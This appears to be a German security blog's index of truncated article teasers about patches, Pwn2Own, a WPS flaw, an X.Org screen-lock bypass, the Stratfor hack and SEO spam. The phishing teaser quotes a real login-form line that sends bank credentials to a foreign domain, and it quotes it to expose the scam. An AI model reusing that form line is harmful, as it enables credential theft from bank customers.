Laut eigener Aussage handelt es sich bei TAILS 0.10.1 um eine reine Wartungs-Version. Die Entwickler haben Sicherheitslücken und schwere Fehler ausgebessert. Alle Anwender sind angewiesen, so zeitnah wie möglich die Aktualisierungen einzuspielen. Es gibt alledings auch einige Änderungen, die für den Anwender mehr oder weniger direkt sichtbar oder spürbar sind. Die Startseite von Iceweasel ist nun die Standard-Suchmaschine. Scroogle ist den Entwicklern derzeit nicht verlässlich genug. WhisperBack und MAT haben Updates auf 1.5.1 beziehungsweise 0.2.2-2~bpo60+1 spendiert bekommen. In letzterem wurde [...]

Bisher war es bei dem Browser-Hacking-Wettbewerb so, dass der Schnellste den großen Preis einheimsen konnte. Dieses Jahr sind die Regeln anders. Die Zielscheiben bleiben Microsoft Internet Explorer, Apple Safari, Google Chrome und Mozilla Firefox unter Windows 7 oder Mac OS X 10.7 “Lion”. Allerdings bekommen die Hacker heuer Punkte. Jeder, der eine funktionierende 0-Day-Schwachstelle zeigen kann, erhält 32 Zähler. Bei Wettbewerbsbeginn werden die Veranstalter außerdem zwei Schwachstellen pro Browser ankündigen, die in der Vergangenheit geschlossen wurden. Wer einen funktionierenden Exploit [...]

Die Entwickler von Google Chrome haben mit Version 16.0.912.77 eine neue stabile Version für Linux, Mac OS X und Windows ausgegeben. Die Wartungs-Ausgabe schließt dabei 5 Sicherheitslücken. Im Rahmen des Kopfgeld-Programms hat sich Google das melden der Schwachstellen insgesamt 6133,70 US-Dollar kosten lassen. Eine der Sicherheitslücken wurde mit 3133,70 US-Dollar dotiert. Der Finder der Schwachstelle 107182 (CVE-2011-3925) hat eine test1.html zur Verfügung gestellt. Diese versucht beim Öffnen http://www.ianfette.org in einem iFrame zu öffnen. Der Browser zeigt eine Malware-Block-Seite. Drückt der [...]

Ein Blogger ist laut eigener Aussage über einen “komischen Fehler” im X.Org Server gestolpert. Dieser Bug lässt sich ausnutzen, um den Bildschirmschoner eines gesperrten Computers auszuhebeln – physikalischer Zugriff vorausgesetzt. Die meisten Leute sperren ihren Bildschirm, wenn sie den Arbeitsplatz verlassen. Unter GNOME ist zum Beispiel gnome-screensaver und unter KDE kscreenlocker dafür verantwortlich. All diese Programme funktionieren irgendwie gleich. Sie erschaffen ein neues X-Fenster als Vollbild, setzen diese ganz nach vorne im Fenster-Stapel und reissen sämtliche Tastatur- und Maus-Eingaben an [...]

Was kann möglicherweise schief gehen, wenn man eine E-Mail mit folgendem Inhalt bekommt? In der elektronischen Nachricht befindet sich als Anhang eine index.html-Datei. Spätestens wenn man aufgefordert wird, eine TAN via E-Mail zugesendetem Formular einzugeben, sollten alle Alarmglocken läuten. Interessant an der index.html ist, dass Teile des Dokuments tatsächlich von meine.deutsche-bank.de nachgeladen werden. Sieht man sich aber an, wohin das Formular gehen soll … hier könnte der Spruch mit der Nachtigall stehen. <form id=”loginForm” method=”post” action=”http://www.herediabienesraices.com.ar/images/go.php”> Die Domäne herediabienesraices.com.ar scheint [...]

Mein guter Freund und Kollege Moritz Jäger hat ein Google-Dokument zur Verfügung gestellt, das als kleine Liste für (nicht-)anfällige Geräte bezüglich der von Stefan Viehböck gefundenen WPS-Lücke in Routern und Access Points dient – klick. Durch eine Design-Schwachstelle in WPS ist es möglich, das System in 4 bis 10 Stunden zu knacken – sofern WPS natürlich aktiviert ist. Das Problem ist, dass bereits die Hälfte der PIN für “gut” befunden werden kann. Somit verringert sich die Anzahl der zu überprüfenden [...]

Die Entwickler der populären CMS- / Blogging-Software WordPress haben Ausgabe 3.3.1 zur Verfügung gestellt. Sie berichten, dass in der neueste Version 15 Probleme aus der Welt geschafft wurden. Ebenso haben die Entwickler eine Sicherheitslücke ausgebessert, die sich für XSS-Angriffe (Cross-Site Scripting) ausnutzen lässt. Andere ausgebesserte Schwierigkeiten enthalten Multi-site Upload Limit ist bei 50 MByte stecken geblieben, ungewollter Backslash in der Ausgabe und ein falsches Zählen der Widgets im Dashboard. Du findest die Liste mit allen behobenen Problemen unter core.trac.wordpress.org. Wer [...]

Strafor wurde gehackt und untere anderem haben Unbekannte mit den gestohlenen Kreditkarten-Nummern eine Million US-Dollar an wohltätige Organisationen gespendet. Das ist bekannt und wurde überalls breit getreten. Nun fängt der Spaß aber erst an! Das Hacker-Kollektiv Anonymous hat bekannt gegeben, nicht für den Stratfor-Hack verantwortlich zu sein. Stratfor stehe unter dem Schutz der Presse-Freiheit und der Ehrenkodex von Anonymous verbiete es, die Medien anzugreifen. Klingt plausibel – Fall abgeschlossen? Nein, denn so einfach ist es doch nicht. Es gibt eine [...]

Normalerweise geb ich ja einen feuchten Dreck auf Mails mit SEO, Linktausch und so weiter. Aber langsam fangen mich Carsten Weiguny (bestereferenzierung.com) und Bettina Knop (bestewebsiteentwicklung.com) zu nerven an. Die Mails sind ziemlich gleich und man verspricht besseres Ranking und so weiter. Die Mails haben sogar Links zu LinkedIn-Profilen, die das Ganze etwas glaubwürdiger machen sollen. Update: Kat O’Connor von SearchEnginesSynergy.com ist der gleiche Mist … Die E-Mails sind in relativ gutem Deutsch (ganz unten angehängt), haben aber kleine Rechtschreibfehler [...]

Also Asus sind echt Spaßbremsen. Da hatte ich mich gefreut wie ein Schnitzel, dass ich nun root-Zugriff auf das Android betriebene EeeTab habe und nur eine Woche später ist er wieder weg. Asus hat nämlich ein Firmware-Update ausgeliefert – 8.6.6.23 und damit eine Sicherheitslücke App Backup ausgenutzt. Diese wurde nun aber von Asus behoben und somit ist auch der schöne root-Zugriff weg – ganz großer Mist … Auf der einen Seite finde ich es ja gut, dass eine Schwachstelle aus [...]